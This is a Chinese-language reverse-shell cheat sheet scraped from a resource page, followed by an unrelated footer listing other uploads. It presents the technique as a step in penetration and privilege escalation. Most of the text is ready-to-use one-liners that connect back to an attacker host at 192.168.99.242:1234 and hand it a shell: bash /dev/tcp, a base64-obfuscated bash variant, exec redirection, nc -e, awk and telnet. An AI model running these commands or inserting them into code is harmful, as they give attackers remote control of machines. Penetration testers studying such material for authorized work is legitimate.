在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续
深入。
反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。
所有姿势,默认情况下,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。
Linux 反弹shell
姿势一:bash反弹
其他版本:
姿势二:nc反弹
姿势三:awk反弹
姿势四:telnet反弹
备注:需要在攻击主机上分别监听1234和4321端口,执行反弹shell命令后,在1234终端输入命令,4321查看命令
执行后的结果。
姿势五:socat反弹
bash -i >& /dev/tcp/192.168.99.242/1234 0>&1
base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|
{base64,-d}|{bash,-i}'
在线编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html
exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5;done
exec /bin/sh 0</dev/tcp/192.168.99.242/1234 1>&0 2>&0
nc -e /bin/bash 192.168.99.242 1234
awk 'BEGIN{s="/inet/tcp/0/192.168.99.242/1234";for(;s|&getline
c;close(c))while(c|getline)print|&s;close(s)}'
telnet 192.168.99.242 1234 | /bin/bash | telnet 192.168.99.242 4321
资源评论
吉吉说安全
- 粉丝: 1102
最新资源
- 机械制造企业项目管理应用分析.docx
- XXXX道路整治工程施工总进度具体计划横道图、网络图、总平面图.doc
- 电子商务网站建设中数据库安全隐患与策略分析.docx
- 服务器存储网络设备巡检报告.docx
- 单片机交通灯设计方案和实现.doc
- 单片机原理及应用技术试卷.doc
- 关于高校网络和信息安全管理与技术分析.docx
- 2012落索坡小学教育信息化建设方案.doc
- 输电线路工程项目管理实施对策分析.docx
- 淘宝网站的设计与应用.doc
- 网络教学下的数学课堂教学.docx
- 探索互联网+模式下提升档案社会服务的有效提升.docx
- spring-boot-seckill-C++资源
- 大数据时代下的物联网进程-专访中国工程院院士、中国互联网协会理事长邬贺铨.docx
- 西北工业大学入学测试机考模拟题及答案专升本计算机基础.doc
- 大数据时代基于云会计的库存管理模式构建.docx
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
